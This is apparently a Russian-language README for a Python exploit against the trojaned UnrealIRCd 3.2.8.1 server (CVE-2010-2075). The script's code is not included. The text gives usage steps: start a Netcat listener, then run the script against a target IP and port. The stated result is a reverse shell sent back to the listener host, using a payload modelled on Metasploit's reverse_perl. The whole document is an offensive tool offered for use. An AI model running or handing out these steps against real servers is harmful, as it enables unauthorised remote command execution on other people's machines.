
Python-эксплойт для бэкдора UnrealIRCd 3.2.8.1 (CVE-2010-2075), доставляющий обратную оболочку через Netcat-слушатель.
Эксплойт выполнения команд через бэкдор в UnrealIRCd 3.2.8.1 на Python 3 (CVE-2010-2075).
Версия UnrealIRCd 3.2.8.1 содержит троянского коня, который позволяет удалённым злоумышленникам выполнять произвольные команды (CVE-2010-2075).
Я опирался на полезную нагрузку Metasploit payload/cmd/unix/reverse_perl при создании этого скрипта.
Запустите слушатель Netcat на принимающем хосте:
nc -lp 4444
Выполните скрипт, указав следующие позиционные аргументы:
python3 script.py <target> <tport> <listener> <lport>
<target> IP-адрес целевого хоста.<tport> Номер порта целевого хоста.<listener> IP-адрес принимающего хоста.<lport> Номер порта принимающего хоста.Настройте слушатель Netcat на вашей локальной машине:
nc -lp 4444
Запустите скрипт против целевой машины по адресу 192.168.1.3 TCP порт 6697:
python3 script.py 192.168.1.3 6697 192.168.1.2 4444
Подождите минуту, и слушатель Netcat должен получить обратную оболочку.